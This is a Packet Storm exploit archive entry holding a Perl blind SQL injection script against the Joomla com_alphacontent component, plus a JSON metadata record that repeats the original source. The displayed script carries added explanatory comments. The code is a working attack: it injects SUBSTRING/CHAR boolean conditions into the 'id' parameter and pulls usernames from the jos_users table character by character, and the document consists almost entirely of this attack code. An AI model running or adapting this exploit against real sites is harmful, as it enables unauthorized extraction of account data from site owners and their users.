ID PACKETSTORM:65877
Type packetstorm
Reporter Inphex
Modified 2008-04-28T00:00:00
Description
`#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
# Positional command-line arguments, in the order shown by the usage line
# below (host, web-root path, article id, marker string).  Nothing is
# validated and the script keeps running when they are missing.  Every
# variable here is a package global; the subs nested in start() read
# $column and $table directly.  Digest::MD5 and HTTP::Cookies, imported
# above, are not referenced anywhere in this script.
$host_ = shift; # prefixed verbatim to the path; the usage example includes the scheme
$path_ = shift; # "index.php" is appended below
$id_ = shift; # article id the injected condition is appended to
$non_find = shift; #choose anything thats inside the article of id
# NOTE(review): $non_find is interpolated into m// as a pattern, not as a
# literal string, so regex metacharacters in it alter the match.
$column = "username"; #change if needed
$table = "jos_users"; #change if needed
print "usage: $0 http://host.com / 17 Following"; # printed unconditionally, no trailing newline
# Request description consumed by start().  'options' configures the
# LWP::UserAgent; 'sending_options'{'attack'} lists each parameter as a
# [where, name, value] triple, where "where" is "get", "post" or "header".
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_alphacontent Blind SQL Injection"],
"version" => [], # empty list: start() prints nothing for this key
"description" => ["This Script will exploit a Blind SQL Injection vulnerability in com_alphacontent\n"],
"options" =>
{
"agent" => "", # empty: start() falls back to "Mozilla/5.0"
"proxy" => "", # empty: no proxy is configured
# This placeholder pair is sent as a real request header ("key: value")
# unless edited; together with the placeholder cookie below it is a literal
# fingerprint of an unmodified copy of the script.
"default_headers" => [
["key","value"]],
"timeout" => 2, # seconds, passed to $ua->timeout
"cookie" =>
{
"cookie" => ["key=value"], # sent verbatim as a Cookie: header
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_."index.php",
"port" => 80, # unpacked by start() but never used to build a URL
"method_a" => "SQL_INJECTION_BLIND", # selects sql_injection_blind() in start()
"attack" =>
{
"option" => ["get","option","com_alphacontent"],
"section" => ["get","section","3"],
"task" => ["get","task","view"],
"cat" => ["get","cat","3"],
# Boolean probe: the literal "$h" and "$i" placeholders are replaced by
# modify() with the character position and the candidate ASCII code.  Each
# probe is one GET; the truth value comes from whether the response body
# still matches the marker pattern ($non_find).
"sql" => ["get","id","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
"regex" => [[$non_find]], # single oracle pattern, consulted by check()
},
},
};
# 222 is the key under which attack() would store its results in the info
# hash; the blind path selected above never writes it.  Called with the
# &name() form, which with parentheses passes only the listed arguments.
&start($info{'info'},222);
# start($info, $id): configures the LWP::UserAgent from $info->{'options'},
# prints the informational fields, then dispatches on
# sending_options{method_a}.  Every worker sub below is nested inside this
# sub's braces (the closing brace is the last line of the script); they read
# start()'s lexicals and a large set of package globals, so evaluation order
# matters throughout.
sub start
{
$a_ = shift; # the info hashref; package global read by every nested sub
$id = shift; # result slot key (222 from the caller)
$get_dA = get_d_p_s("get"); # "name=value&..." for the "get" entries, in reverse hash-walk order
$post_dA = get_d_p_s("post"); # same for "post" entries; empty with this config, so the GET path is taken
# $c appears twice in this list and $h is re-declared as "" below; the later
# declarations win.
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1; # capture counter used by attack()
my $ii = 48; # first candidate ASCII code ('0') for the blind loop
my $hh = 1; # 1-based character position for SUBSTRING()
my $ppp = 0; # request counter, incremented in check() but never read
my $s = shift; # no third argument is passed, so this is undef
my $a = "";
my $res_p = ""; # last response body
my $h = ""; # regex-list index; "" is numeric 0
# Port is read here but never used again: the host string supplies the scheme
# and the URL is host.path.
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); # one proxy for both schemes
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; # default UA string when 'agent' is empty
$ua->agent($agent);
{
# Print "key:first element" for every key except options/sending_options.
# The foreach runs once per element but always prints element [0], so a key
# with N elements prints its first element N times.
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options")
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}
# Default headers are indexed by the separate counter $m rather than $j; the
# placeholder ["key","value"] pair from the config is pushed as-is.
foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}
if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}
}
# Switch.pm is a source filter.  With this config method_a is
# SQL_INJECTION_BLIND; every other value, known or not, reaches attack().
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }
}
# attack(): generic one-shot request path (not reached with this config).
# Sends once, keeps the body under $a_->{$id}{'content'}, then walks the
# regex list pulling numbered captures out via ${$jj} - a symbolic reference
# to the package variable named "1", "2", ... i.e. $1, $2 (relies on strict
# refs being off).  The capture count is read from the regex entry's second
# element, which this config does not set, so the inner loop would not run.
sub attack
{
if ($post_dA eq "") {
$method = "get";
} elsif ($post_dA ne "")
{
$method = "post";
}
if ($method eq "get") {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post")
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}
}
# sql_injection_blind(): extracts one value character by character.  For the
# current position $hh the inner loop asks the check() oracle about every
# ASCII code 48..90 ('0'-'9', ':;<=>?@', 'A'-'Z'); a TRUE answer prints the
# character lower-cased at once (syswrite, unbuffered) and advances the
# position.  Each oracle call is one HTTP GET to index.php with
# option=com_alphacontent whose id parameter differs only in the SUBSTRING
# offset and CHAR() value - that burst of near-identical requests is what
# shows up in access logs.  The durable mitigation is in the component, not
# here: presumably treating id as an integer, or binding it as a query
# parameter, removes the oracle entirely.  Note the exit test compares
# $#ffs - 1 with the scalar $ffs, a different variable from @ffs that this
# file never assigns.
sub sql_injection_blind
{
syswrite STDOUT,$column.":";
while () # no condition: loops until the exit below
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii); # accumulated value so far (package global)
}
$ii++;
}
push(@ffs,length($chr)); # one length entry per full sweep
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48; # restart the candidate range for the next position
}
}
# check($code, $position): oracle for one (candidate ASCII code, character
# position) pair.  Rebuilds the query via modify(), sends it, and returns 1
# when the response body matches the first regex, else 0.  Both branches
# return on the first iteration, so $h++ and any further patterns are never
# reached.  The ($$) prototype is declared after the call site in
# sql_injection_blind() above, so it is not applied there.
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post") ne "") # re-walks the attack entries on every call
{
$method = "post";
} else { $method = "get";}
if ($method eq "get")
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post")
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);
$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
# modify($string, $char_code, $position): substitutes the literal
# placeholders "$i" (character code) and "$h" (position) in a query string.
# Each substitution replaces the span from the first index() to the last
# rindex() occurrence, i.e. exactly one occurrence of each placeholder is
# expected.  With neither placeholder present the string is printed and no
# value is returned explicitly.
sub modify($$$)
{
$string = shift;
$replace_by = shift; # value for "$i"
$replace_by1 = shift; # value for "$h"
if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
}
}
# get_d_p_s("get"|"post"|"header"): walks sending_options{attack} and sorts
# each [where, name, value] triple by its first element (a pattern match,
# not eq) into @get, @post or %header_dA, then returns the requested part:
# a "name=value&" string for get/post, the flattened hash for header.
# @get/@post are package arrays that are never emptied and the $bb counter
# persists, so every call (one per request via get_data/post_data) sees the
# accumulated lists.  $k is reused after the each() loop as the @post
# counter; it is undef once each() is exhausted.  The query string is
# assembled from the last element backwards.  $header_data is set but unused.
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
{
$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{
$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get")
{
return $get_data;
}
elsif ($g_d_p_s eq "post")
{
return $post_data;
} elsif ($g_d_p_s eq "header")
{
return %header_dA;
}
}
# get_data($host, $path): one GET to $host.$path.  Assigns its arguments to
# the same package globals start() unpacked for host/path, so those change
# after the first call.  Re-applies the 'header' entries to the UA's default
# headers on every call (duplicates accumulate when any exist; none in this
# config).  Returns the body with no HTTP status check.
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); # $req is actually the HTTP::Response
return $req->content;
}
# post_data($host, $path, $content_type, $body): same as get_data() but
# builds an HTTP::Request POST (the class is not use'd here; it is loaded by
# LWP::UserAgent) with the given content type and body, and returns the
# response body unchecked.
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}
} # end of start(); the nested subs above are compiled with it
`
{"id": "PACKETSTORM:65877", "type": "packetstorm", "bulletinFamily": "exploit", "title": "joomlaalpha-blindsql.txt", "description": "", "published": "2008-04-28T00:00:00", "modified": "2008-04-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/65877/joomlaalpha-blindsql.txt.html", "reporter": "Inphex", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:18:46", "viewCount": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:18:46", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:46", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/65877/joomlaalpha-blindsql.txt", "sourceData": "`#!/usr/bin/perl \n#eSploit Framework - Inphex \nuse Digest::MD5 qw(md5 md5_hex md5_base64); \nuse LWP::UserAgent; \nuse HTTP::Cookies; \nuse Switch; \n$host_ = shift; \n$path_ = shift; \n$id_ = shift; \n$non_find = shift; #choose anything thats inside the article of id \n$column = \"username\"; #change if needet \n$table = \"jos_users\"; #change if needet \nprint \"usage: $0 http://host.com / 17 Following\"; \n$info{'info'} = { \n\"author\" => [\"cO2,Inphex\"], \n\"name\" => [\"Joomla com_alphacontent Blind SQL Injection\"], \n\"version\" => [], \n\"description\" => [\"This Script will exploit a Blind SQL Injection vulnerability in com_alphacontent\\n\"], \n\"options\" => \n{ \n\"agent\" => \"\", \n\"proxy\" => \"\", \n\"default_headers\" => [ \n[\"key\",\"value\"]], \n\"timeout\" => 2, \n\"cookie\" => \n{ \n\"cookie\" => [\"key=value\"], \n}, \n}, \n\"sending_options\" => \n{ \n\"host\" => $host_, \n\"path\" => $path_.\"index.php\", \n\"port\" => 80, \n\"method_a\" => \"SQL_INJECTION_BLIND\", \n\"attack\" => \n{ \n\"option\" => [\"get\",\"option\",\"com_alphacontent\"], \n\"section\" => [\"get\",\"section\",\"3\"], \n\"task\" => [\"get\",\"task\",\"view\"], \n\"cat\" => [\"get\",\"cat\",\"3\"], \n\"sql\" => 
[\"get\",\"id\",\"\".$id_.\"%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20LIMIT%200,1),\\$h,1)=CHAR(\\$i)\"], \n\"regex\" => [[$non_find]], \n}, \n}, \n}; \n&start($info{'info'},222); \nsub start \n{ \n$a_ = shift; \n$id = shift; \n$get_dA = get_d_p_s(\"get\"); \n$post_dA = get_d_p_s(\"post\"); \nmy ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); \nmy $jj = 1; \nmy $ii = 48; \nmy $hh = 1; \nmy $ppp = 0; \nmy $s = shift; \nmy $a = \"\"; \nmy $res_p = \"\"; \nmy $h = \"\"; \n($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'}); \n$ua = LWP::UserAgent->new; \n$ua->timeout($a_->{'options'}{'timeout'}); \nif ($a_->{'options'}{'proxy'}) { \n$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); \n} \n$agent = $a_->{'options'}{'agent'} || \"Mozilla/5.0\"; \n$ua->agent($agent); \n{ \nwhile (($k,$v) = each(%{$a_})) \n{ \nif ($k ne \"options\" && $k ne \"sending_options\") \n{ \nforeach $r (@{$a_->{$k}}) \n{ \nif ($a_->{$k}[0]) \n{ \nprint $k.\":\".$a_->{$k}[0].\"\\n\"; \n} \n} \n} \n} \n \nforeach $j (@{$a_->{'options'}{'default_headers'}}) \n{ \n$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); \n$m++; \n} \nif ($a_->{'options'}{'cookie'}{'cookie'}[0]) \n{ \n$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); \n} \n \n} \nswitch ($method_m) \n{ \ncase \"attack\" { &attack();} \ncase \"SQL_INJECTION_BLIND\" { &sql_injection_blind();} \ncase \"REMOTE_COMMAND_EXECUTION\" { &attack();} \ncase \"REMOTE_CODE_EXECUTION\" {&attack();} \ncase \"REMOTE_FILE_INCLUSION\" { &attack();} \ncase \"LOCAL_FILE_INCLUSION\" { &attack(); } \nelse { &attack(); } \n} \n \nsub attack \n{ \n \nif ($post_dA eq \"\") { \n$method = \"get\"; \n} elsif ($post_dA ne \"\") \n{ \n$method = \"post\"; \n} \nif 
($method eq \"get\") { \n$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.\"?\".$get_dA); \n${$a_}{$id}{'content'} = $res_p; \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \n$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; \n \nwhile ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) \n{ \nif (${$jj} ne \"\") \n{ \n${$a_}{$id}{'regex'}[$h] = ${$jj}; \n} \n$jj++; \n} \n$h++; \n} \n} elsif ($method eq \"post\") \n{ \n$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.\"?\".$get_dA,\"application/x-www-form-urlencoded\",$post_dA); \n \n${$a_}{$id}{'content'} = $res_p; \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \n$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; \nwhile ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) \n{ \nif (${$jj} ne \"\") \n{ \n${$a_}{$id}{'regex'}[$h] = ${$jj}; \n} \n$jj++; \n} \n$h++; \n} \n} \n} \nsub sql_injection_blind \n{ \nsyswrite STDOUT,$column.\":\"; \nwhile () \n{ \nwhile ($ii <= 90) \n{ \nif(check($ii,$hh) == 1) \n{ \nsyswrite STDOUT,lc(chr($ii)); \n$hh++; \n$chr = $chr.chr($ii); \n} \n$ii++; \n} \npush(@ffs,length($chr)); \nif (($#ffs -1) == $ffs) \n{ \nprint \"\\nFinished/Error\\n\"; \nexit; \n} \n$ii = 48; \n} \n} \nsub check($$) \n{ \n$ii = shift; \n$hh = shift; \nif (get_d_p_s(\"post\") ne \"\") \n{ \n$method = \"post\"; \n} else { $method = \"get\";} \nif ($method eq \"get\") \n{ \n$ppp++; \n$query = modify($get_dA,$ii,$hh); \n$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.\"?\".$query); \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \nif ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) \n{ \nreturn 1; \n} \nelse \n{ \nreturn 0; \n} \n$h++; \n} \n} elsif ($method eq \"post\") \n{ \n$ppp++; \n$query_g = modify($get_dA,$ii,$hh); \n$query_p = modify($post_dA,$ii,$hh); \n \n$res_p = 
post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.\"?\".$query_g,\"application/x-www-form-urlencoded\",$query_p); \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \nif ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) \n{ \nreturn 1; \n} \nelse \n{ \nreturn 0; \n} \n$h++; \n} \n} \n} \nsub modify($$$) \n{ \n$string = shift; \n$replace_by = shift; \n$replace_by1 = shift; \nif ($string !~/\\$i/ && $string !~/\\$h/) { \nprint $string; \n} elsif ($string !~/\\$i/) \n{ \n$ff = substr($string,0,index($string,\"\\$h\")); \n$ee = substr($string,rindex($string,\"\\$h\")+2); \n$string = $ff.$replace_by1.$ee; \nreturn $string; \n} elsif ($string !~/\\$h/) \n{ \n$f = substr($string,0,index($string,\"\\$i\")); \n$e = substr($string,rindex($string,\"\\$i\")+2); \n$string = $f.$replace_by.$e; \nreturn $string; \n} else \n{ \n$f = substr($string,0,index($string,\"\\$i\")); \n$e = substr($string,rindex($string,\"\\$i\")+2); \n$string = $f.$replace_by.$e; \n$ff = substr($string,0,index($string,\"\\$h\")); \n$ee = substr($string,rindex($string,\"\\$h\")+2); \n$string = $ff.$replace_by1.$ee; \nreturn $string; \n} \n} \nsub get_d_p_s \n{ \n$g_d_p_s = shift; \n$post_data = \"\"; \n$get_data = \"\"; \n$header_data = \"\"; \n%header_dA = (); \nwhile (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) \n{ \nif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"get\") \n{ \n$method = \"get\"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1].\"=\".$a_->{'sending_options'}{'attack'}{$k}[2]); \n} \nelsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"post\") \n{ \n$method = \"post\"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1].\"=\".$a_->{'sending_options'}{'attack'}{$k}[2]); \n} \nelsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"header\") \n{ \n$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; \n} \n$hp++; \n} \n$yy = $#get; \nwhile ($bb <= $#get) \n{ \n$get_data .= $get[$yy].\"&\"; 
\n$bb++; \n$yy--; \n} \n$l = $#post; \nwhile ($k <= $#post) \n{ \n \n$post_data .= $post[$l].\"&\"; \n$k++; \n$l--; \n} \nif ($g_d_p_s eq \"get\") \n{ \n \nreturn $get_data; \n} \nelsif ($g_d_p_s eq \"post\") \n{ \nreturn $post_data; \n} elsif ($g_d_p_s eq \"header\") \n{ \nreturn %header_dA; \n} \n} \nsub get_data \n{ \n$h_host_h_xdsjaop = shift; \n$h_path_h_xdsjaop = shift; \n%hash = get_d_p_s(\"header\"); \nwhile (($u,$c) = each(%hash)) \n{ \n$ua->default_headers->push_header($u => $c); \n} \n$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); \nreturn $req->content; \n} \nsub post_data \n{ \n$h_host_h_xdsjaop = shift; \n$h_path_h_xdsjaop = shift; \n$content_type = shift; \n$send = shift; \n%hash = get_d_p_s(\"header\"); \nwhile (($u,$c) = each(%hash)) \n{ \n$ua->default_headers->push_header($u => $c); \n} \n$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop); \n$req->content_type($content_type); \n$req->content($send); \n$res = $ua->request($req); \nreturn $res->content; \n} \n} \n \n`\n"}
{}